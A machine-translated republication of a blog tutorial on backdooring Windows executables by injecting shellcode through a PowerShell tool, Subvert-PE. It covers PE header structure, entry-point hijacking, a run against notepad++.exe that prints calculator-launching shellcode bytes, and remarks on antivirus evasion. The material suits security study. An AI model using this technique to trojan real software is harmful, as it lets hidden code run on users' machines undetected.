How to use Powershell PE injection to hit your calculator all over your face 03/11 Update SLTechnology News&Howtos

How to use Powershell PE injection to hit your calculator all over your face

2025-03-11 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article is about how to use Powershell PE injection to hit your calculator. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

We'll look at programmatically injecting shellcode into the PE executable on disk, and note that we're just talking about exe files, and the PE file format includes many other extensions (dll,ocx,sys,cpl,fon,...). Doing this manually is very simple, and the key point is to ensure that the functionality of the PE has not changed so as not to arouse suspicion. But manual injection is often not practical. You need to make a copy of PE, change it on your own host, and then replace the file on the target machine. To simplify this process, I created a Subvert-PE program that automatically rewrites a PE executable (x86&x64). Fix the offset of the entry point, inject shellcode, and return the execution flow back to the legitimate code. I like to give the tool to people who have a chance to understand how it works. This article focuses more on reviewing the relevant parts of the PE format, and after understanding the structure of PE, modifying it with Powershell is just a pediatrics.

This post may contain information / excerpts / images from the official Microsoft documentation, which is provided under the DMCA Fair use Policy. If anyone has any questions about this, please send me an email.

Link:

[Microsoft Official PE-COFF Documentation (MSDN)]

[Portable Executable (Corkami)]

Tools:

[Subvert-PE.ps1]

PE header

The best way to learn new knowledge is to have a concrete example. To lay the foundation in practice, we will complete the PE header of 32-bit notepad++ step by step. PE headers usually include the following components: MS-DOS headers, rich signatures, PE headers, optional headers and table partitions.

I won't highlight all the meaningful WORD/DWORD/QWORD for each section, because this is a rough overview.

MS-DOS header:

In this example, the DOS header extends from the bottom of the image (0x00) to 0x7F (127bytes).

The important thing to remember here is that at the offset position 0x3C (60 bytes), it is a DWORD that provides the actual offset position of the PE head. The offset position of the PE header is not fixed, it changes with the change of the binary program. Of course, for those interested, the static "MZ" identifier corresponds to Mark Zbikowski (initials), one of the MS-DOS developers.

Rich signature (Rich Signature):

Rich signatures are mentioned here mainly out of curiosity. Although the PE format has a long history (window3.1-1993), this part has been undocumented (discontinued) by Microsoft. In short, it stores data about PE compilation. For an in-depth overview, you can read the Daniel Pistelli analysis in [NTCORE] (http://www.ntcore.com/files/richsign.htm)).

PE header:

The PE header consists of an ASCII signature and a standard COFF file header, and you should notice that there is a blank byte padding between the rich signature and the PE header. For Notepad++, the size of the fill is 0x0F (15 bytes), but the size varies depending on the PE.

A more complete picture is provided below, and you can find all the possible values for "Machine Type" and "Characteristics". These are all from the official documents of Microsoft.

Optional header:

The optional header provides some loading information to the loader, which is only optional and usually does not exist in the object file. The size of the optional header varies, as indicated by the optional header size in the upper PE header.

Many sections are not highlighted, and for a more complete overview, please refer to Microsoft's official documentation and the picture below [Corkami Analysis] showing all possible "Subsystem Type" field values.

Table partitions: table partitions closely follow the optional headers, which is necessary because the image does not contain a pointer to this part, and the offset is calculated based on the combined size of the PE header. Each defined segment size is 0x28 (40 bytes). The number of sections can be obtained from the PE header.

The picture below shows all possible section tag values, but usually only a few appear regularly (readable / executable, initialized data, discarded)

The above table shows only the first section of the Notepad++PE, and the other sections (a total of 4 sections), directly following the ".text" section.

Manipulating binaries with Powershell

Now that we have a preliminary understanding of the PE header format, we can start looking at bytes read and written from bytes to binaries.

Operand array:

The first thing we should look at is the conversion between hexadecimal bytes and integers.

Very interesting, but the main goal is still to edit the files on disk. I created a simple 4-byte file to illustrate how to implement it.

Edit PE Mirror

It's time to put the theory into practice. To solve the problem of editing PE images, we will set a simple goal for ourselves, find the offset of the module entry point, and rewrite it with 0xAABBCCDD.

Running this script in the terminal produces the following results.

Let's see what happens when PE is loaded in the immune system (Immunity).

You will find that the entry point is not 0xAABBCCDD but 0xAAFBCCDD. This is to be expected because when the PE is loaded into memory, the entry point offset is added to the mirror library, which is offset (0x00400000). From our point of view, this is not important because any dynamic calculations we do are automatically added to the mirror library. If it is rebase/ASLR, this value can be static or dynamic.

Subvert-PE

It's time to take off! If we want to modify PE, we usually need the following steps:

(1) calculate the offset from the first executable part to the empty byte fill part

(2) replace the module entry point with the offset calculated in the first step

(3) write our shellcode to that offset.

(4) add the stub to shellcode, and the stub jumps to the legal entry point.

The picture under describes the above execution process.

As mentioned in the above introduction, performing these steps is no more complex than calculating the offset in the array. To do this, I created a program (Subvert-PE) that dynamically modifies PE images and supports x86 and x64. The Subvert-PE function contains shellcode, which is used to start the calculator, which is written by SkyLined. More details on this section of shellcode can be found here.

Let's look at a practical example.

PS C:\ Users\ b33f >. .\ ToolKit\ Subvert-PE.ps1

PS C:\ Users\ b33f > Get-Help Subvert-PE-Full

NAME

Subvert-PE

SYNOPSIS

Inject shellcode into a PE image while retaining the PE functionality.

Author: Ruben Boonen (@ FuzzySec)

License: BSD 3-Clause

Required Dependencies: None

Optional Dependencies: None

SYNTAX

Subvert-PE-Path [- Write] []

DESCRIPTION

Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry

Point. After the shellcode executes, program execution is handed back over to the legitimate PE entry

Point.

PARAMETERS

-Path

Path to portable executable.

Required? True

Position? Named

Default value

Accept pipeline input? False

Accept wildcard characters?

-Write []

Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image"

Base "and dump the memory at the null-byte location.

Required? False

Position? Named

Default value

Accept pipeline input? False

Accept wildcard characters?

This cmdlet supports the common parameters: Verbose, Debug

ErrorAction, ErrorVariable, WarningAction, WarningVariable

OutBuffer and OutVariable. For more information, type

"get-help about_commonparameters".

INPUTS

OUTPUTS

-EXAMPLE 1-

C:\ PS > Subvert-PE-Path C:\ Path\ To\ PE.exe

EXAMPLE 2--

C:\ PS > Subvert-PE-Path C:\ Path\ To\ PE.exe-Write

RELATED LINKS

[url] http://www.fuzzysecurity.com/[/url]

PS C:\ Users\ b33f > Subvert-PE-Path'C:\ Program Files\ Notepad++\ notepad++.exe'-Write

Legitimate Entry Point Offset: 0x000B7159

Preferred PE Image Base: 0x00400000

Null-Byte Padding dump:

00 00 00

Modified Entry Point Offset: 0x000DA6B6

Inject Far JMP: 0xe9fffdca54

Null-Byte Padding After:

31 D2 52 68 63 61 6C 63 89 E6 52 56 64 8B 72 30 8B 76 0C 8B 76

AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 4C

24 01 F9 42 AD 81 3C 07 57 69 6E 45 75 F5 0F B7 54 51 FE 8B 74

1C 01 FE 03 3C 96 FF D7 E9 54 CA FD FF 00 00 00

00 00 00

In the screenshot below, we can see that notepad++ starts normally and opens the calculator at the same time!

The screenshot below shows some sample injections on win7 Professional 32-bit and win8 Enterprise platforms

Note:

(1) in PE executable programs, this script has a success rate of about 90%, but only 50% success rate in 64-bit systems. This is because empty byte padding is very small in x64 systems. In general, you should not use the "- Write" option to execute scripts

(2) obviously, shellcode can be replaced with more valuable code, which is not covered here to avoid abuse. There are a few things you need to remember: because we need to maintain the execution flow, shellcode does not exit the function, when shellcode as part of the PE code can not extract itself, it is not writable. In a few test cases, PE requires the initial registry values to run correctly, so they need to be restored after execution.

(3) injecting signed binaries will invalidate the signature, but this only needs to be concerned when obtaining evidence. In addition, because we hid shellcode in our custom executable, Killer had no way of knowing what was going on and would be happy to let the program run. I found that Comodo had noticed the changes to PE, which quarantined the executable, but still allowed execution. I suspect it has detected that the entry point has been tampered with.

(4) Don't mess around, this tool can only be created and used after authorization!

Thank you for reading! This is the end of this article on "how to use Powershell PE injection to hit your face calculator". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it out for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.